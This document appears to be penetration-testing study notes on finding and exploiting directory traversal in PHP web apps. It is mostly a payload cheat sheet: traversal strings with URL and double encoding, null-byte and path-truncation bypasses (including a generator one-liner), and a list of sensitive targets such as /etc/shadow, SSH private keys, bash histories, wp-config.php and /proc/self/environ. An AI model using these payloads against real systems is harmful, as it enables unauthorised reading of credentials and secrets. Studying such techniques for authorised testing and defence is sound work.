# Identifying Directory Traversals ```bash https://example.com/cms/login.php?language=en.html ``` - `login.php` tells us the web application uses **PHP** - the URL contains a *language* parameter with an HTML page as its value. We should try to navigate to the file directly (`https://example.com/cms/en.html`). If we can successfully open it, we can confirm that `en.html` is a file on the server, meaning we can use this parameter to try other file names. - the URL contains a directory called `cms`. This is important information indicating that the web app is running in a subdirectory of the web root. --- # Exploit Directory Traversals ```bash ../../../etc/passwd /../../../etc/passwd ....//....//....//etc/passwd /cgi-bin/../../../../../etc/passwd /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd # Encoding ..%2F..%2F..%2Fetc%2Fpasswd %2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd # Double Encoding ..%252F..%252F..%252Fetc%252Fpasswd # Null Bytes /etc/passwd%00 # Approved Paths - Find the approved path and go back to the root directory and read the file /index.php?language=./languages/../../../../etc/passwd # Appended Extensions (e.g., .php) - Doesn't work on modern PHP - If we reach 4096 character limitation, the appended extension would be truncated - Start the path with a non-existing directory ?language=non_existing_dir/../../../../../etc/passwd/././././. (REPEAT) echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done ``` # Exploit ```bash /etc/passwd /etc/shadow C:\Windows\System32\drivers\etc\hosts #windows C:\inetpub\wwwroot\web.config /home/john/.ssh/id_rsa /home/john/.ssh/authorized_keys /home/john/.bash_history /var/www/html/config.php /var/www/html/wp-config.php /var/www/html/index.php /var/www/html/.git/config /var/www/html/uploads /proc/self/environ /root/.bash_history ```